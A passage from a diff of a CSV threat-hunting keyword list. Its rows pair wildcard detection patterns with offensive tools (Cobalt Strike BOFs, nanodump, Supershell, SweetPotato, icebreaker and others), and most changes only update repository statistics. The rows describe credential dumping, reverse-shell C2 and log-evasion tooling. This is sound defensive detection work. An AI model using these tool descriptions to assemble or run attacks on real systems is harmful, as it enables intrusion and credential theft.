Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" -"*sudo bloodhound*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*sudo -nS id' && lse_sudo=true*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*sudo bloodhound*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*sudo -nS id' && lse_sudo=true*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*sudo tmux new -s icebreaker*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*sudo_inject*","offensive_tool_keyword","sudo_inject","Privilege Escalation by injecting process possessing sudo tokens Inject process that have valid sudo token and activate our own sudo token","T1055 - T1548.001 - T1059.002","TA0002 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nongiach/sudo_inject","1","1","N/A","N/A","7","649","122","2019-04-14T07:43:35Z","2019-03-24T22:06:22Z" "*SUDO_KILLER*","offensive_tool_keyword","SUDO_KILLER","sudo exploitation #Abusing sudo #Exploiting Sudo #Linux Privilege Escalation #OSCP If you like the tool and for my personal motivation so as to develop other tools please a +1 star The tool can be used by pentesters. system admins. CTF players. students. System Auditors and trolls :).","T1078 - T1059 - T1204","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/TH3xACE/SUDO_KILLER","1","1","N/A","N/A","10","1977","244","2023-08-02T08:53:48Z","2018-12-07T21:08:02Z" -"*sudomy.git*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1718","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*sudomy.git*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" "*sudopwn.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*SUID3NUM -*","offensive_tool_keyword","SUID3NUM","A standalone python2/3 script which utilizes pythons built-in modules to find SUID bins. separate default bins from custom bins. cross-match those with bins in GTFO Bins repository & auto-exploit those. all with colors! ( ?? ?? ??)","T1168 - T1553 - T1210 - T1059","TA0001 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Anon-Exploiter/SUID3NUM","1","0","N/A","N/A","6","570","129","2021-08-15T20:37:50Z","2019-10-12T07:40:24Z" "*sullo/nikto*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" "*SunloginClient_11.0.0.33162_X64.exe*","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/sunlogin_rce","1","1","N/A","N/A","5","462","201","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z" "*superhedgy/AttackSurfaceMapper*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" -"*Supernova.exe -*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*Supernova-main.zip*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*supershell*winpty.dll*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*supershell*winpty-agent.exe*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*surajpkhetani/AutoSmuggle*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*Supernova.exe -*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*Supernova-main.zip*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*supershell*winpty.dll*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*supershell*winpty-agent.exe*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*surajpkhetani/AutoSmuggle*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" "*suspended_run *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*suspendresume.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*suspendresume.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*suspendresume.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*suspendresume.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*svc_stager.exe*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*SW2_GetSyscallNumber*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" "*SW2_GetSyscallNumber*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" @@ -17465,33 +17648,33 @@ "*SW3_GetSyscallAddress*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*swaks --to * --from * --header *Subject: * --body * --server *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*SwampThing.exe*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" -"*SwampThing.exe*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*SwampThing.pdb*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*SwampThing.sln*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*SwampThing.exe*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*SwampThing.pdb*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*SwampThing.sln*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*SWbemServicesImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*sweetpotato -p*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*sweetpotato -p*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*SweetPotato.cna*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*SweetPotato.csproj*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*SweetPotato.exe*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" -"*SweetPotato.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 